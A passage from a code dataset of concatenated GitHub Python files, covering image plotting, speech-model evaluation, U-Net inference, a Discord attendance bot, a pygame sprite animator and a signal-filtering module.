y:y + 2, i]\n for i in [0, 1]], color=color, linewidth=2)\n\n for a in ['bottom', 'top', 'left', 'right']: # color borders\n ax.spines[a].set_color(color)\n ax.spines[a].set_linewidth(2)\n\n ax.set_xticks([])\n ax.set_yticks([]) # remove ticks\n ax.imshow(img) # add image\n\n\ndef plot_color_histogram(img_file, cd, ax, color='r', annot=None, annot_size=10):\n '''Displays color histogram from an image\n\n Parameters\n ----------\n img_file: str\n Path to image file\n cd: ColorDensity object\n Instance of the ColorDensity class from color_density.py\n ax: matplotlib Axes\n Axes in which to display the image\n color: str or tuple\n Color for vertical lines and annot\n (argument for matplotlib functions)\n annot: None or iterable\n If not None, must be an iterable of equal length of\n the nsegs attribute of cd.\n annot_size: int\n Fontsize for annotation\n '''\n\n hist = cd.fit_transform([img_file])[0] # get histogram\n bps = int(len(hist) / cd.nsegs) # bars per segment\n cmap = bar_color_map(cd.n_bins) # colormap for bars\n\n bar_cmap = [] # need to create cmap that matches hist length\n for n in range(cd.nsegs):\n bar_cmap.extend(cmap) # duplicate cmap for each segment\n bar_cmap.append([0, 0, 0]) # add dummy zero for spacing\n\n y_val = [] # need to extend hist values to allow spaceing\n for i in range(cd.nsegs):\n y_val.extend(hist[i * bps:(i + 1) * bps]) # this segment of hist\n y_val.append(0) # add dummy zero for spacing\n\n # extend by nsegs to account for spaces we added\n x_val = range(len(hist) + cd.nsegs)\n\n bars = ax.bar(x=x_val, height=y_val) #  plot bars\n for i in range(1, cd.nsegs): # add vertical lines at spacing\n ax.axvline((i * bps) + ((i - 1) * 1), linestyle=':', color=color)\n\n for idx, b in enumerate(bars): # for each bar\n b.set_color(bar_cmap[idx]) # apply correct color\n b.set_edgecolor('k') # add edge color\n\n # remove ticks, set limit, add axis labels\n ax.set_xticks([])\n ax.set_xlim(-1, len(x_val))\n ax.set_xlabel('Color bin')\n ylab = 'Density' if cd.nsegs == 1 else 'Density within segment'\n ax.set_ylabel(ylab)\n\n if cd.nsegs > 1:\n y = ax.get_ylim()[1] * 0.95 # where to add annotation\n offset = ax.get_xlim()[1] / (2 * cd.nsegs)\n for i in range(cd.nsegs):\n x = (i * bps) + ((i - 1) * 1) + offset # where to add annotation\n s = 'Segment {}'.format(i + 1) # label\n if annot is not None: # if extra description supplied\n s += '\\n' + annot[i]\n ax.text(x=x, y=y, s=s, color=color, fontsize=annot_size,\n va='top', ha='center')\n\n\ndef bar_color_map(nbins=3):\n ''' Get list of RGB color shades for color histogram plot\n\n Parameters\n ----------\n nbins: int\n the number of bins used to generate histograms\n (i.e. n_bins argument into the ColorDensity object used)\n\n Returns\n -------\n cmap: numpy array\n Array of shape (nbins**3, 3), where each row contains the\n numeric definition of RGB color shade\n '''\n step = 1 / nbins # steps to take\n # we start by defining the midpoint of each bin\n perc = np.arange(step / 2, 1 + (step / 2), step=step)\n # perform loop to get the RGB values for the nbins**3 shades\n cmap = np.array([[a, b, c] for a in perc for b in perc for c in perc])\n return cmap\n","repo_name":"subhalingamd/multimodal-meme-classification","sub_path":"codes/github_package_downloads/radialColorHistogram-master/plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31676555297","text":"import os\nimport hydra\nfrom omegaconf import DictConfig, OmegaConf\nimport yaml\nimport pickle\nfrom tqdm import tqdm\n\nimport numpy as np\nimport torch\n\nfrom zerospeech_lm.models.utils import reset_hidden, load_checkpoint\nfrom zerospeech_lm.models.lm import LSTM_model, QRNN_model\nfrom zerospeech_lm.models.clustering import load_clustering\n\n\ndef eval_model(model, clustering, epoch, args, dev_only=True):\n create_submission_folder(epoch, args)\n\n splits = ['dev']\n if not dev_only:\n splits.append('test')\n\n for split in splits:\n model.eval()\n if clustering is None:\n quantized_eval(model, epoch, split, args)\n else:\n feature_eval(model, clustering, epoch, split, args)\n\ndef feature_eval(model, clustering, epoch, split, args):\n split_dir = os.path.join(args.eval_data_dir, 'lexical', split)\n hidden_state = reset_hidden(args, eval=True)\n\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'outputs', str(epoch), 'lexical', split + '.txt'), 'w') as out_file:\n for file_name in tqdm(os.listdir(split_dir), desc='Evaluating model on {} split'.format(split), ascii=True):\n if file_name[-4:] != '.npy':\n continue\n\n seq = np.load(os.path.join(split_dir, file_name)).astype(float)\n\n clustered_seq = clustering.predict(seq).reshape(1, -1)\n clustered_seq = torch.from_numpy(clustered_seq).to(torch.int64)\n x = clustered_seq[:, :-1].to(args.device)\n y = clustered_seq[:, 1:].to(args.device)\n \n score = 0.\n probs, _ = model(x, hidden_state)\n print(probs.shape)\n for i in range(y.size(1)):\n score += probs[0,i,y[0,i]].item()\n\n out_file.write('{} {}\\n'.format(file_name[:-4], score))\n\ndef quantized_eval(model, epoch, split, args):\n hidden_state = reset_hidden(args, eval=True)\n tasks = ['syntactic', 'lexical']\n for task in tasks:\n split_dir = os.path.join(args.eval_data_dir, task, split)\n\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'outputs', str(epoch), task, split + '.txt'), 'w') as out_file, \\\n open(os.path.join(split_dir, 'quantized_outputs.txt')) as in_file:\n\n quants = in_file.readlines()\n\n for line in tqdm(quants, desc='Evaluating model on {} task {} split'.format(task, split), ascii=True):\n file_name, seq = line.split()\n seq = np.array(seq.split(','), dtype=np.int32)\n seq = torch.tensor(seq).to(torch.int64)\n if args.inverse_seqs:\n seq = seq.flip(0) # flip sequences for backward training\n x = seq[:-1].reshape(1,-1).to(args.device)\n y = seq[1:].reshape(1,-1).to(args.device)\n \n score = 0.\n probs, _ = model(x, hidden_state)\n for i in range(y.size(1)):\n score += probs[0,i,y[0,i]].item()\n\n out_file.write('{} {}\\n'.format(file_name, score))\n\ndef calculate_entropy(model, data, epoch, args):\n path = os.path.join(args.save_dir, 'entropy', str(epoch))\n if not os.path.exists(path):\n os.makedirs(path)\n\n hidden_state = reset_hidden(args, eval=True)\n dd = {}\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'entropy', str(epoch), 'entropy'), 'wb') as out_file:\n for seq, file_name in tqdm(data, desc='Calculating entropy', ascii=True):\n seq = torch.tensor(seq).to(torch.int64)\n x = seq[:-1].reshape(1,-1).to(args.device)\n probs, _ = model(x, hidden_state)\n entropy = (probs[0] * torch.exp(probs[0])).sum(1).cpu().numpy()\n dd[file_name] = entropy\n pickle.dump(dd, out_file)\n\ndef create_submission_folder(epoch, args):\n # main folder\n path = os.path.join(args.save_dir, 'outputs', str(epoch))\n if not os.path.exists(path):\n os.makedirs(path)\n \n # task-specific folders\n for sub_name in ['lexical', 'phonetic', 'semantic', 'syntactic']:\n sub_path = os.path.join(path, sub_name)\n if not os.path.exists(sub_path):\n os.makedirs(sub_path)\n \n # meta.yaml file\n meta_dict = {\n 'author': 'author',\n 'affiliation': 'affiliation',\n 'description': 'description',\n 'open_source': False,\n 'train_set': 'LibriSpeech',\n 'gpu_budget': 1,\n 'parameters': {\n 'phonetic': {\n 'metric': 'euclidean',\n 'frame_shift': 1\n },\n 'semantic': {\n 'metric': 'euclidean',\n 'pooling': 'min'\n }\n }\n }\n yaml.dump(meta_dict, open(os.path.join(path, 'meta.yaml'), 'w'))\n\n print('Submission folder for epoch {} created'.format(epoch))\n\n\n@hydra.main(config_path='../configs', config_name='config')\ndef eval(args):\n if args.quantized:\n clustering = None\n args.n_clusters += 1\n else:\n clustering = load_clustering(args)\n\n if args.arch == 'LSTM':\n model = LSTM_model(args.n_clusters, args)\n elif args.arch == 'QRNN':\n model = QRNN_model(args.n_clusters, args)\n else:\n raise ValueError('Architecture not valid')\n model.to(args.device)\n \n resume_epoch = 0\n model, _, resume_epoch = load_checkpoint(model, args)\n\n if args.nGPU > 1:\n model = torch.nn.DataParallel(model)\n print(model, '\\n')\n\n eval_model(model, clustering, resume_epoch-1, args, dev_only=args.dev_only)\n\n\nif __name__ == '__main__':\n eval()","repo_name":"chorowski-lab/zs2021","sub_path":"zerospeech_lm/scripts/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20056473616","text":"import os\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri\n\nclass Model:\n def __init__(self, path):\n self.path = path\n\n def evaluate(self, x) -> list:\n pass\n\nclass RModel(Model):\n def __init__(self, \n r_file_path,\n r_function,\n param_names,\n strata,\n population=None):\n path = os.path.abspath(r_file_path)\n r = ro.r\n r.setwd(os.path.dirname(path))\n r.source(os.path.basename(path))\n make_simulation_func = ro.globalenv[r_function]\n\n self.simulate_func = make_simulation_func(\n population,\n param_names,\n strata\n )\n\n def evaluate(self, x) -> list:\n return self.simulate_func(x)\n\n\nstrata = ['y{}_{}'.format(i, i+4) for i in range(50, 85, 5)]\n# Input parameter names \nparam_names = ['.p_progression_cancer_s1_2'] * len(strata)\nr_file_path = '../../models/endometrium/calibration_wrapper.R'\nr_function = 'calibration.simulation'\n\nec_model = RModel(r_file_path, r_function, param_names, strata, 'bleeding')\nresult = ec_model.evaluate([.1 for e in param_names])\nprint(result)","repo_name":"david-gomez-guillen/phd","sub_path":"notebooks/optimization/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1616749661","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom algorithm.unet.unet.unet_model import UNet\nfrom algorithm.unet.utils.dataset import BasicDataset\n\n\ndef predict_img(net,\n full_img,\n device,\n scale_factor=1,\n out_threshold=0.5):\n net.eval()\n\n img = torch.from_numpy(BasicDataset.preprocess(full_img, scale_factor))\n\n img = img.unsqueeze(0)\n img = img.to(device=device, dtype=torch.float32)\n\n with torch.no_grad():\n output = net(img)\n\n if net.n_classes > 1:\n probs = F.softmax(output, dim=1)\n else:\n probs = torch.sigmoid(output)\n\n probs = probs.squeeze(0)\n\n tf = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.Resize(full_img.size[1]),\n transforms.ToTensor()\n ]\n )\n\n probs = tf(probs.cpu())\n full_mask = probs.squeeze().cpu().numpy()\n\n return full_mask > out_threshold\n\n\ndef get_output_filenames(args):\n out_path = ''\n input_split = os.path.splitext(args)\n name_split = input_split[0].split(\"/\")\n for i in range(len(name_split) - 1):\n out_path = out_path + name_split[i] + \"/\"\n out_path = out_path + '{}_out{}'.format(name_split[-1], input_split[1])\n return out_path\n\n\ndef mask_to_image(mask):\n return Image.fromarray((mask * 255).astype(np.uint8))\n\n\ndef unet_semantic(img_path):\n in_files = img_path\n out_path = get_output_filenames(img_path)\n # model_path = \"MODEL.pth\"\n model_path = os.path.dirname(__file__) + \"/MODEL.pth\"\n pretrained = torch.load(model_path)\n net = UNet(n_channels=3, n_classes=1)\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n net.to(device=device)\n net.load_state_dict(torch.load(model_path, map_location=device))\n\n img = Image.open(in_files)\n\n mask = predict_img(net=net,\n full_img=img,\n scale_factor=0.5,\n out_threshold=0.5,\n device=device)\n\n result = mask_to_image(mask)\n result.save(out_path)\n return out_path\n","repo_name":"buaa-gavin/zhanying","sub_path":"backend/algorithm/unet/UnetSemantic.py","file_name":"UnetSemantic.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"10690418160","text":"#!/usr/bin/python\n#_*_ coding:utf8 _*_\n\n#My result:\n\"\"\"\nThe numbers called by people in Bangalore have codes:\n022\n040\n04344\n044\n04546\n0471\n080\n0821\n7406\n7795\n7813\n7829\n8151\n8152\n8301\n8431\n8714\n9008\n9019\n9035\n9036\n9241\n9242\n9341\n9342\n9343\n9400\n9448\n9449\n9526\n9656\n9738\n9740\n9741\n9742\n9844\n9845\n9900\n9961\n24.81 percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\n\"\"\"\n\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\ndef number_called_by_bangalore(input_csv):\n\t#def_var area:\n\tnumber_called_by_bangalore_list = []\n\t#step1:create a list that get all number head.\n\tfor i in input_csv:\n\t\tif \"(080)\" in i[0]:\n\t\t\tif \"(0\" in i[1] and i[1][4] == \")\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:4])\n\t\t\telif \"(0\" in i[1] and i[1][5] == \")\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:5])\n\t\t\telif \"(0\" in i[1] and i[1][6] == \")\" :\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:6])\n\t\t\tif i[1][0] == \"7\" or i[1][0] == \"8\" or i[1][0] == \"9\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][0:4])\n\t\t\tif i[1][0:3] == \"140\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][0:3])\n\t#step2:feedback result for return part.Need transform list format(including set\\sort\\line by line).\n\tnumber_called_by_bangalore_list = \"\\n\".join(sorted(set(number_called_by_bangalore_list)))\n\tfeedback_string = \"The numbers called by people in Bangalore have codes:\" + \"\\n\" +number_called_by_bangalore_list\n\treturn feedback_string\n\ndef number_count_bangalore_bangalore(input_csv):\n\t#def_var area:\n\tnumber_count_bangalore_all = 0\n\tnumber_count_bangalore_bangalore = 0\n\t#step1:count time that two kinds of call(banaglore to all,bangalore to bangalore).\n\tfor i in input_csv:\n\t\tif \"(080)\" in i[0]:\n\t\t\tnumber_count_bangalore_all += 1.0\n\t\t\tif \"(080)\" in i[1]:\n\t\t\t\tnumber_count_bangalore_bangalore += 1.0\n\t#step2:feedback result for return part.\n\tfeedback_cache_percent = round((number_count_bangalore_bangalore / number_count_bangalore_all) * 100,2)\n\tfeedback_string = \"{} percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\".format(feedback_cache_percent)\n\treturn feedback_string\n\nprint(number_called_by_bangalore(calls))\nprint(number_count_bangalore_bangalore(calls))","repo_name":"Abel712/Udacity_Python-introduction-","sub_path":"Project1=investigate-texts-and-calls/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38537133987","text":"from sys import stdin\ninput = stdin.readline\ndef solution(N):\n dp = [1] * 10001\n for i in range(2, 10001):\n dp[i] += dp[i-2]\n \n for i in range(3, 10001):\n dp[i] += dp[i-3]\n\n for _ in range(N):\n t = int(input())\n print(dp[t])\n\nsolution(int(input()))","repo_name":"oo009pbh/Today-I-learn","sub_path":"DP/1, 2, 3 더하기 4.py","file_name":"1, 2, 3 더하기 4.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26835249322","text":"# 이미지 사이즈에 따라서 바인딩 위치 조절하기\n\nimport cv2\ntry:\n from cv2 import cv2\nexcept ImportError:\n pass\nimport numpy as np\n\n\ndef cvTest():\n image = cv2.imread('./catNdog.png')\n y_ = image.shape[0]\n x_ = image.shape[1]\n\n target_size = 256\n x_scale = target_size / x_\n y_scale = target_size / y_\n print('x_scale >> ', x_scale, '\\ny_scale >> ', y_scale)\n\n img = cv2.resize(image, (target_size, target_size))\n bboxes = [[3.96, 183.38, 200.88, 214.03], [468.94, 92.01, 171.06, 248.45]]\n for boxes in bboxes:\n x_min, y_min, w, h = boxes\n\n x1 = int(np.round(x_min * x_scale))\n y1 = int(np.round(y_min * y_scale))\n x2 = int(np.round((x_min+w) * x_scale))\n y2 = int(np.round((y_min+h) * y_scale))\n\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 0), 1)\n\n cv2.imshow('test', img)\n cv2.waitKey(0)\n\n\n\nif __name__ == '__main__':\n cvTest()","repo_name":"NoirCade/MS-AI-School","sub_path":"53일차/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40793624349","text":"from typing import DefaultDict\nimport asyncio\nimport configparser\nimport os.path\n\nfrom discord.ext import commands\nimport texttable\n\nimport creds\n\nconfig = configparser.ConfigParser()\nif not os.path.exists(\"./stats.ini\"): \n with open(\"./stats.ini\",\"w\") as cfg:\n config.write(cfg)\nconfig.read('./stats.ini')\n\nbot = commands.Bot(command_prefix='>', description=\"This is a Helper Bot\")\nlateMessage = DefaultDict(bool)\n\n\n@bot.command()\nasync def late(ctx, *args):\n global lateMessage\n print(\"late\")\n for name in args:\n lateMessage[name] = True\n await ctx.send(f'{name} is running late...')\n if name not in config:\n config[name] = {\"timesLate\":int(1), \"minsLate\":int(0)}\n else:\n config[name][\"timesLate\"] = str(int(config[name][\"timesLate\"]) + 1)\n config[name][\"minsLate\"] = str(int(config[name][\"minsLate\"]) + 1)\n i = 1\n while True:\n count = 0\n await asyncio.sleep(5)\n for name in args:\n\n if lateMessage[name] == True:\n count += 1\n print(config[name][\"minsLate\"] )\n config[name][\"minsLate\"] = str(int(config[name][\"minsLate\"]) + 1)\n await ctx.send(f'{name} is {i} minute(s) late...')\n if count == 0:\n break\n i += 1\n\n@bot.command()\nasync def here(ctx, *args):\n global lateMessage\n print(\"Starting here\")\n for name in args:\n if lateMessage[name]:\n await ctx.send(f\"...And {name} is finally here!\")\n lateMessage[name] = False\n with open(\"./stats.ini\",\"w\") as cfg:\n config.write(cfg)\n\n@bot.command()\nasync def stats(ctx, *args):\n table = texttable.Texttable()\n table.add_row([\"Name\", \"Times Late\", \"Minutes Late\"])\n if len(args) == 0:\n for section in config.sections():\n table.add_row([section, config[section][\"timesLate\"], config[section][\"minsLate\"]]) \n else:\n for name in args:\n if config.has_section(name):\n table.add_row([name, config[name][\"timesLate\"], config[name][\"minsLate\"]]) \n else:\n table.add_row([name, 0, 0]) \n\n await ctx.send(f\"```{table.draw()}```\") \n\nbot.run(creds.token)\n","repo_name":"jkershaw2000/late-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7407569067","text":"import pygame\nfrom . import spritebatch\n\nclass SpriteAnimation:\n\n def __init__(self, surface, dimensions, sprite_count, loop=False, animation_frames=1):\n \"\"\"Load Sprite Sheet\"\"\"\n self.sprites = spritebatch.get_sprite_batch( surface, dimensions, sprite_count )\n self.sprite_dimensions = dimensions\n self.sprite_iter = 0\n self.loop = loop\n self.animation_frames = animation_frames\n self.current_frame = animation_frames\n self.sprite_count = sprite_count\n\n def getSpriteBox(self):\n # Convert sprite to rectangle format\n sprite_box = pygame.Rect( 0, 0, self.sprite_dimensions[2], self.sprite_dimensions[3] )\n return sprite_box\n\n def resetFrames(self):\n self.sprite_iter = 0\n self.current_frame = animation_frames\n\n def setNextFrame(self):\n self.current_frame -= 1\n if self.current_frame == 0:\n self.sprite_iter += 1\n self.current_frame = self.animation_frames\n if ( self.sprite_iter >= self.sprite_count ):\n if not self.loop:\n return\n else:\n self.sprite_iter = 0\n\n def getCurrentFrame(self):\n image = self.sprites[ self.sprite_iter ]\n return image\n","repo_name":"adinh254/Pac-Portal","sub_path":"pacportal/spritesheet/spriteanimation.py","file_name":"spriteanimation.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15374127800","text":"import numpy as np\r\nfrom operator import itemgetter\r\nimport time as tm\r\nimport RALF1FilterX as XFilter\r\nimport sys\r\nimport lfib1340 \r\nfrom scipy import stats as scp\r\nimport win32api,win32process,win32con\r\n#from scipy.signal import savgol_filter\r\n \r\npriorityclasses = [win32process.IDLE_PRIORITY_CLASS,\r\n win32process.BELOW_NORMAL_PRIORITY_CLASS,\r\n win32process.NORMAL_PRIORITY_CLASS,\r\n win32process.ABOVE_NORMAL_PRIORITY_CLASS,\r\n win32process.HIGH_PRIORITY_CLASS,\r\n win32process.REALTIME_PRIORITY_CLASS]\r\n\r\ndef filterFourierQ(arxx,arb,NNew,NChan): \r\n Nfl=int(len(arb)/NChan)\r\n Nnl=NNew\r\n \r\n ar_=np.zeros(Nnl,float)\r\n farx=np.zeros(Nnl,float)\r\n \r\n az=int(np.floor(Nfl/Nnl))-1\r\n \r\n for l in range(NChan): \r\n for i in range(az):\r\n for j in range(Nnl):\r\n ar_[j]=arb[Nfl-(az-i+1)*Nnl+j+Nfl*l]\r\n ar_=abs(np.fft.fft(ar_))\r\n for j in range(Nnl):\r\n farx[j]=max(farx[j],ar_[j])\r\n \r\n farx[0]=1e-32\r\n arxr=np.zeros(Nfl*NChan,float) \r\n for l in range(NChan): \r\n farxx=np.fft.fft(arxx[Nfl-Nnl+Nfl*l:Nfl+Nfl*l]) \r\n mfarxx=abs(farxx) \r\n mfarxx[0]=1e-32\r\n srmfarxx=.62*np.mean(mfarxx[1:])\r\n farxxx=np.zeros(Nnl,complex) \r\n for j in range(1,Nnl):\r\n if mfarxx[j]>srmfarxx:\r\n farxxx[j]=farxx[j]/mfarxx[j]*farx[j] \r\n else:\r\n farxxx[j]=0 \r\n farxxx[0]=farxx[0]\r\n farxxx2=np.zeros(2*Nnl,complex)\r\n farxxx2=farxxx.copy()\r\n arxr[Nfl-Nnl+Nfl*l:Nfl+Nfl*l]=np.fft.ifft(farxxx2).real[0:Nnl] \r\n arxr[0+Nfl*l:Nfl-Nnl+Nfl*l]=arb[0+Nfl*l:Nfl-Nnl+Nfl*l].copy() \r\n return arxr\r\n\r\ndef RALF1FilterQ(dQ2): \r\n Np=len(dQ2)\r\n Nf=len(dQ2[0])\r\n \r\n SdQ=np.mean(dQ2,0) \r\n sSdQ=np.std(np.asarray(SdQ,float))\r\n for i in range(Np):\r\n SdQj_ = np.std(np.asarray(dQ2[i] - SdQ,float))\r\n SdQj__ = np.std(np.asarray(dQ2[i],float)) \r\n if SdQj__ >0. and sSdQ>0.:\r\n dQ2[i] = np.asarray(dQ2[i] +SdQ * ((SdQj_ - sSdQ)/ sSdQ ),np.float16)\r\n else:\r\n dQ2[i]=np.zeros(Nf,np.float16) \r\n return dQ2\r\n\r\ndef RandomQ(Nfx):\r\n KK=3e6\r\n liiX=np.zeros(Nfx,float)\r\n pp=0\r\n while pp<0.055:\r\n for ii in range(3):\r\n z=np.random.randint(Nfx)/KK \r\n atim0=tm.time() \r\n tm.sleep(z) \r\n atim=tm.time() \r\n dd=int((atim-atim0-z)*KK)\r\n zz=np.asarray(range(Nfx),float)/KK\r\n lfib1340.LFib1340(dd).shuffle(zz) \r\n liiX=liiX+zz\r\n \r\n k2, pp = scp.normaltest(liiX)\r\n \r\n r2=[[],[]]\r\n r2[0]= np.asarray(liiX[0:Nfx],float)\r\n r2[1]= np.asarray(range(Nfx),int)\r\n m=[[r2[j][l] for j in range(len(r2))] for l in range(len(r2[0]))] \r\n m.sort(key=itemgetter(0)) \r\n r2=[[m[j][l] for j in range(len(m))] for l in range(len(m[0]))] \r\n liiXX=np.asarray(r2[1],int)\r\n return liiXX\r\n \r\ndef RALF1Calculation(arr_bx,Nf,NNew,NChan,D,Nhh):\r\n Koe=1e-4 \r\n arr_bZ=[]\r\n arr_b=np.asarray(arr_bx,float)\r\n #arr_b[0]=0\r\n for l in range(NChan):\r\n #arr_b[l]=arr_bx[l]-arr_bx[l-1] \r\n arr_bZ.append(arr_b[0+Nf*l:Nf-NNew+Nf*l]) \r\n arr_bZ=np.asarray(arr_bZ,np.float16)\r\n mn=np.mean(arr_bZ)\r\n sz=Nf*NChan\r\n \r\n hh=0\r\n ann=0\r\n \r\n arr_bbx=[]\r\n while hh0: \r\n try: \r\n dQ3A=dQ3-mn \r\n dQ3B=dQ3A-dQ3A*np.asarray(dQ3A<0,int) \r\n dQ2X=XFilter.RALF1FilterX(dQ3B+mDD,sz,sz,1,0)\r\n dQ3C=-(dQ3A-dQ3A*np.asarray(dQ3A>0,int)) \r\n dQ2Y=-XFilter.RALF1FilterX(dQ3C+mDD,sz,sz,1,0)\r\n dQ3=dQ3*0\r\n for i in range(sz): \r\n dQ3[:][liix[i]]=((dQ2X[i]+dQ2Y[i])) \r\n aMx=np.max(dQ3,0)\r\n aMn=np.min(dQ3,0)\r\n w=0\r\n except:\r\n w=1\r\n else: \r\n dQ3_0=dQ3.copy()-mn \r\n\r\n Ndel=2#int(np.ceil(np.sqrt(sz)))\r\n NCh=int(np.ceil(sz/Ndel)) \r\n Ndel0=1\r\n NCh0=int(np.ceil(sz/Ndel0)) \r\n annn=1\r\n \r\n ss4=0\r\n while annn>0: \r\n dQ3=dQ3_0.copy()\r\n zz=9\r\n dQ3mx=np.zeros((sz,sz),np.float16)-np.Inf\r\n dQ3mn=np.zeros((sz,sz),np.float16)+np.Inf\r\n NumFri=RandomQ(sz)\r\n NumFri_=RandomQ(sz) \r\n r5=RandomQ(sz) \r\n r5=D*((r5/np.std(r5))/2+Koe*10) \r\n \r\n NumFri=np.concatenate((NumFri, NumFri)) \r\n NumFri_=np.concatenate((NumFri_, NumFri_)) \r\n r5=np.concatenate((r5, r5)) \r\n \r\n while zz>=0: \r\n try: \r\n for uuu in range(Nhh):\r\n if zz>=0:\r\n ss4=ss4+1\r\n ss4_=ss4-int(ss4/sz)*sz\r\n NumFri0=NumFri[ss4_:].copy()\r\n NumFri0_=NumFri_[ss4_:].copy()\r\n for kk in range(Ndel):\r\n ii=int(kk*NCh)\r\n for k in range(Ndel0):\r\n i=int(k*NCh0) \r\n dQ4=np.zeros((NCh,NCh0),float)\r\n mDD4=np.zeros((NCh,NCh0),float) \r\n for ll in range(NCh0):\r\n dQ4[:,ll]=(dQ3[NumFri0[ii:ii+NCh],NumFri0_[i+ll]])*1.\r\n mDD4[:,ll]=(mDD[NumFri0[ii:ii+NCh],NumFri0_[i+ll]])*1.\r\n mDD4[:,ll]= r5[ll+k+kk:ll+k+kk+NCh]*(1-(mDD4[:,ll]0))+mDD4,len(dQ4),len(dQ4[0]),1,0))+dQ4mn/2,np.float16)\r\n if not (np.isnan(np.mean(dQ4_A))+np.isnan(np.mean(dQ4_B))): \r\n for ll in range(NCh0):\r\n dQ3mx[NumFri0[ii:ii+NCh],NumFri0_[i+ll]]=(np.maximum(\r\n dQ3mx[NumFri0[ii:ii+NCh],NumFri0_[i+ll]],dQ4_A[:,ll]))\r\n dQ3mn[NumFri0[ii:ii+NCh],NumFri0_[i+ll]]=(np.minimum(\r\n dQ3mn[NumFri0[ii:ii+NCh],NumFri0_[i+ll]],dQ4_B[:,ll]))\r\n \r\n if not (np.isnan(np.mean(dQ3mx))+np.isnan(np.mean(dQ3mn))+np.isnan(dQ4mn)+np.abs(dQ4mn)==np.Inf): \r\n dQ3A=(dQ3mx+dQ3mn)*(1-(mDD0,int)) \r\n dQ2Y=-XFilter.RALF1FilterX(dQ3C+mDD,sz,sz,1,0)+dQ4mn/2\r\n if not (np.isnan(np.mean(dQ2X))+np.isnan(np.mean(dQ2Y))): \r\n dQ3=np.asarray((dQ2X+dQ2Y)*(1-(mDD0 or (np.isnan(dQ4mn)+np.abs(dQ4mn)==np.Inf):\r\n annn=1\r\n zz=-1\r\n \r\n except:\r\n annn=1\r\n zz=-1\r\n \r\n zz=zz-1\r\n \r\n dQ3=dQ3*0\r\n for i in range(sz): \r\n dQ3[:][liix[i]]=np.asarray((dQ2X[i]+dQ2Y[i]),np.float16)\r\n \r\n del(dQ3mx)\r\n del(dQ3mn) \r\n aMx=np.max(dQ3,0)\r\n aMn=np.min(dQ3,0) \r\n \r\n # Nfl=int(len(arr_bx)/NChan)\r\n # for l in range(NChan): \r\n # aMx[0+Nfl*l:Nfl+Nfl*l]= savgol_filter(aMx[0+Nfl*l:Nfl+Nfl*l], 11, 5)\r\n # aMn[0+Nfl*l:Nfl+Nfl*l]= savgol_filter(aMn[0+Nfl*l:Nfl+Nfl*l], 11, 5)\r\n \r\n ann=sum(np.isnan(aMx + aMn))\r\n if ann==0: \r\n if hh==0: \r\n AMX=aMx.copy()\r\n AMN=aMn.copy() \r\n else:\r\n AMX=np.maximum(AMX,aMx)\r\n AMN=np.minimum(AMN,aMn)\r\n \r\n arr_bbbxxx=AMX+AMN\r\n arr_bbbxxx=filterFourierQ(arr_bbbxxx,arr_b,NNew,NChan)\r\n if hh==0:\r\n arr_bbx=arr_bbbxxx.copy() \r\n else: \r\n arr_bbx=(arr_bbx*hh+arr_bbbxxx)/(hh+1) \r\n hh=hh+1\r\n \r\n #arr_bbbxxx=aMx + aMn \r\n # ann=sum(np.isnan(arr_bbbxxx))\r\n # if ann==0: \r\n # arr_bbx.append(arr_bbbxxx) \r\n # hh=hh+1\r\n\r\n \r\n # arr_bbx=np.asarray(arr_bbx,float).transpose()\r\n # for l in range(NChan):\r\n # for ii in range(NNew): \r\n # arr_b[Nfl-NNew+Nfl*l+ii]=(max(arr_bbx[Nfl-NNew+Nfl*l+ii])+min(arr_bbx[Nfl-NNew+Nfl*l+ii]))/2\r\n\r\n # arr_b=filterFourierQ(arr_b,arr_b,NNew,NChan)\r\n return arr_bbx+mn\r\n\r\ndef RALf1FiltrQ(args):\r\n pid = win32api.GetCurrentProcessId()\r\n handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)\r\n win32process.SetPriorityClass(handle, priorityclasses[1])\r\n NChan=int(args[1])\r\n 